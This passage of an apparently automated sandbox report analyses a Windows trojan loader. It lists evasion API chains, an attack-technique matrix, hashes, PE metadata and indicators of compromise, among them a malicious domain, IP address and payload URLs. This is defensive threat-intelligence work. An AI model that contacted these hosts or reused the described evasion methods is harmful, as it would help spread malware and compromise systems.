            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-33258
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeAPI coverage: 8.9 %
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_028058CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028058CC
            Source: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000003.2570752062.000000000069A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000003.2570752062.00000000006B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeAPI call chain: ExitProcess graph end nodegraph_0-33257
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_02817AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_02817AC0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0286C3AD mov eax, dword ptr fs:[00000030h]0_2_0286C3AD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_0281D5D0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02805A90
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: GetLocaleInfoA,0_2_0280A780
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: GetLocaleInfoA,0_2_0280A7CC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_02805B9C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_0281D5D0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_02825FA0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_028091C8 GetLocalTime,0_2_028091C8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.19638.13648.exeCode function: 0_2_0280B748 GetVersionExA,0_2_0280B748
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts
            11
            Native API
            1
            Valid Accounts
            1
            Valid Accounts
            1
            Valid Accounts
            OS Credential Dumping1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/Job1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Access Token Manipulation
            LSASS Memory1
            Query Registry
            Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            Security Account Manager1
            Security Software Discovery
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
            Obfuscated Files or Information
            NTDS1
            System Network Connections Discovery
            Distributed Component Object ModelInput Capture13
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Software Packing
            LSA Secrets1
            File and Directory Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials24
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe37%ReversingLabsWin32.Trojan.ModiLoader
            SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe44%VirustotalBrowse
            SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            eventureofficial.com13%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://eventureofficial.com/L100%Avira URL Cloudphishing
            https://eventureofficial.com:443/avi/255_Aerocihhjph100%Avira URL Cloudphishing
            https://eventureofficial.com/avi/255_AerocihhjphDLL100%Avira URL Cloudphishing
            https://eventureofficial.com/avi/255_AerocihhjphDLLWH100%Avira URL Cloudphishing
            https://eventureofficial.com/S=100%Avira URL Cloudphishing
            https://eventureofficial.com/L2100%Avira URL Cloudphishing
            https://eventureofficial.com/avi/255_Aerocihhjph;100%Avira URL Cloudphishing
            https://eventureofficial.com/%100%Avira URL Cloudphishing
            https://eventureofficial.com/avi/255_Aerocihhjph0100%Avira URL Cloudphishing
            https://eventureofficial.com/avi/255_Aerocihhjphgen.19638.13648.exe100%Avira URL Cloudphishing
            https://eventureofficial.com/avi100%Avira URL Cloudphishing
            https://eventureofficial.com/avi/255_Aerocihhjph100%Avira URL Cloudphishing
            https://eventureofficial.com/avi/255_AerocihhjphL100%Avira URL Cloudphishing
            https://eventureofficial.com/L10%VirustotalBrowse
            https://eventureofficial.com/Y100%Avira URL Cloudphishing
            https://eventureofficial.com/avi/255_AerocihhjphLc100%Avira URL Cloudphishing
            https://eventureofficial.com/avi/255_AerocihhjphDLLc-k100%Avira URL Cloudphishing
            https://eventureofficial.com/100%Avira URL Cloudphishing
            https://eventureofficial.com/12%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            eventureofficial.com
            68.178.157.109
            truefalseunknown
            NameMaliciousAntivirus DetectionReputation
            https://eventureofficial.com/avi/255_Aerocihhjphfalse
            • Avira URL Cloud: phishing
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://eventureofficial.com/LSecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000003.2570574005.0000000000717000.00000004.00000020.00020000.00000000.sdmptrue
            • 10%, Virustotal, Browse
            • Avira URL Cloud: phishing
            unknown
            https://eventureofficial.com/S=SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2678847488.000000000071C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://eventureofficial.com:443/avi/255_AerocihhjphSecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2678847488.0000000000710000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://eventureofficial.com/avi/255_AerocihhjphDLLSecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000003.2570574005.0000000000717000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2678847488.0000000000717000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://eventureofficial.com/avi/255_AerocihhjphDLLWHSecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000003.2570574005.0000000000717000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://eventureofficial.com/L2SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2678847488.000000000071C000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://eventureofficial.com/avi/255_Aerocihhjph;SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2678847488.00000000006BC000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://eventureofficial.com/%SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000003.2570574005.00000000006CD000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://eventureofficial.com/avi/255_Aerocihhjph0SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2678847488.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://eventureofficial.com/avi/255_Aerocihhjphgen.19638.13648.exeSecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2678847488.000000000066F000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://eventureofficial.com/aviSecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2693673726.00000000205ED000.00000004.00001000.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            https://eventureofficial.com/avi/255_AerocihhjphLSecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000003.2570574005.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2678847488.0000000000703000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: phishing
            unknown
            http://www.pmail.comSecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2679906356.0000000002800000.00000040.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000003.1439006094.000000007FD80000.00000004.00001000.00020000.00000000.sdmpfalse
              high
              https://eventureofficial.com/YSecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2678847488.000000000071C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              unknown
              https://eventureofficial.com/avi/255_AerocihhjphLcSecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2678847488.00000000006BC000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              unknown
              https://eventureofficial.com/avi/255_AerocihhjphDLLc-kSecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000003.2570752062.000000000069A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2678847488.00000000006AA000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: phishing
              unknown
              https://eventureofficial.com/SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000003.2570574005.0000000000717000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe, 00000000.00000002.2678847488.000000000071C000.00000004.00000020.00020000.00000000.sdmpfalse
              • 12%, Virustotal, Browse
              • Avira URL Cloud: phishing
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              68.178.157.109
              eventureofficial.comUnited States
              26496AS-26496-GO-DADDY-COM-LLCUSfalse
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1431787
              Start date and time:2024-04-25 19:23:10 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 25s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
              Detection:MAL
              Classification:mal88.troj.evad.winEXE@1/0@1/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 22
              • Number of non-executed functions: 41
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              19:24:15API Interceptor61x Sleep call for process: SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              68.178.157.109Pictures.com.exeGet hashmaliciousDBatLoaderBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                eventureofficial.comPictures.com.exeGet hashmaliciousDBatLoaderBrowse
                • 68.178.157.109
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                AS-26496-GO-DADDY-COM-LLCUSDatabase4.exeGet hashmaliciousUnknownBrowse
                • 107.180.63.55
                Database4.exeGet hashmaliciousUnknownBrowse
                • 107.180.63.55
                Pictures.com.exeGet hashmaliciousDBatLoaderBrowse
                • 68.178.157.109
                SecuriteInfo.com.Win32.PWSX-gen.13503.2707.exeGet hashmaliciousAgentTeslaBrowse
                • 148.66.139.57
                https://gem.godaddy.com/signups/activate/MS0tY1AvemVtNUJYZW1aRkZhVXV5em1LMGovQVFvanpXTEJkVTNMTmpjSEVzUGpjYU1MSEJvUk9zQ1hjNjUvSG0wYURPNmF0a0N4TWVpWTFLdFJacGZvLS1RLzlVbk90eVpkZEYzNE42LS1pcmlqMm9EaTRpY0xmR2h4RzF3QVVBPT0?signup=11093294Get hashmaliciousUnknownBrowse
                • 198.71.248.151
                SecuriteInfo.com.FileRepMalware.7644.21541.exeGet hashmaliciousAgentTeslaBrowse
                • 148.66.136.7
                Order Confirmations.exeGet hashmaliciousAgentTeslaBrowse
                • 43.255.154.57
                SHIPMENT ADVICE FOR CLEARTEX.exeGet hashmaliciousAgentTeslaBrowse
                • 148.66.136.7
                https://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=https://liceogalois.co/w712969.shtml&ved=2ahUKEwiQ2rPsxpGFAxXETEEAHemID4gQFnoECBAQAQGet hashmaliciousUnknownBrowse
                • 173.201.190.176
                bCsfnThSOV.exeGet hashmaliciousPhemedrone StealerBrowse
                • 173.201.180.75
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                • 68.178.157.109
                file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                • 68.178.157.109
                file.exeGet hashmaliciousLummaCBrowse
                • 68.178.157.109
                Iu4csQ2rwX.msiGet hashmaliciousAsyncRATBrowse
                • 68.178.157.109
                o7b91j8vnJ.exeGet hashmaliciousLummaCBrowse
                • 68.178.157.109
                SHEOrder-10524.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                • 68.178.157.109
                file.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                • 68.178.157.109
                https://56hytuti5.weebly.com/Get hashmaliciousUnknownBrowse
                • 68.178.157.109
                udVh4Ist4Z.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                • 68.178.157.109
                samradapps_datepicker_221114.xlamGet hashmaliciousUnknownBrowse
                • 68.178.157.109
                No context
                No created / dropped files found
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.905080173423458
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.81%
                • Windows Screen Saver (13104/52) 0.13%
                • Win16/32 Executable Delphi generic (2074/23) 0.02%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                File name:SecuriteInfo.com.Win32.Evo-gen.19638.13648.exe
                File size:941'568 bytes
                MD5:8342a62cbd21058faf999a350267b4f9
                SHA1:6e37c47f6252c55b274a9b16c266861055986a26
                SHA256:fce48ed70e8f1e2259e2b5e471e5c10e0a37223db8cd251c900669d5deb86740
                SHA512:bf8823d4c3336afc802fff7fd5035d64ba53573fe481883a7c11143b3afc25ee8f0c620c8dbf090ad22cb363658af40597d27110a5311f4c4d109ae0fde5b62d
                SSDEEP:12288:TXjVMqppxSe+4QxUMH1LYY1A7ou8kyxeC7vTKwCrmDOd9rR0/sL:TZ9pxSe+Pxdp/G7oulaeC6HicPL
                TLSH:A7159EE2A1F148B2E26B04F4D8CB33D42456FE7A3D345AC99BDC7D186E643943E24267
                File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                Icon Hash:50b2b272d3cc2ed6
                Entrypoint:0x456f14
                Entrypoint Section:.itext
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                DLL Characteristics:
                Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:3f32d2ef200c00ac0ebcdf2fda20675f
                Instruction
                push ebp
                mov ebp, esp
                add esp, FFFFFFF0h
                mov eax, 004530E4h
                call 00007FF67CDA17C9h
                mov eax, dword ptr [004D5E3Ch]
                mov eax, dword ptr [eax]
                call 00007FF67CDEBA01h
                mov ecx, dword ptr [004D5F28h]
                mov eax, dword ptr [004D5E3Ch]
                mov eax, dword ptr [eax]
                mov edx, dword ptr [00452F30h]
                call 00007FF67CDEBA01h
                mov eax, dword ptr [004D5E3Ch]
                mov eax, dword ptr [eax]
                call 00007FF67CDEBA75h
                call 00007FF67CD9F844h
                lea eax, dword ptr [eax+00h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0xda0000x24cc.idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE0xe50000x8eb8.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                IMAGE_DIRECTORY_ENTRY_BASERELOC0xdf0000x5d9c.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0xde0000x18.rdata
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0xda6d40x5bc.idata
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x10000x522d40x52400378a6681eafeaf7d78613ed4cf92b8e8False0.5346041508358662data6.549671940681492IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .itext0x540000x2f5c0x3000e9144ab6726641f6935a5f4bad9f3ef4False0.35400390625data5.473917787533742IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .data0x570000x7efc00x7f000819bb84f4c42815adbcebcca15311823False0.4072515532726378data6.435278949307934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .bss0xd60000x36540x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata0xda0000x24cc0x26000b2c9523a029190bdd9cf8eed2f7e9b4False0.31620065789473684data5.106859474494806IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .tls0xdd0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rdata0xde0000x180x2000f48411216d6f3e3c0eed478053d0150False0.05078125data0.2108262677871819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
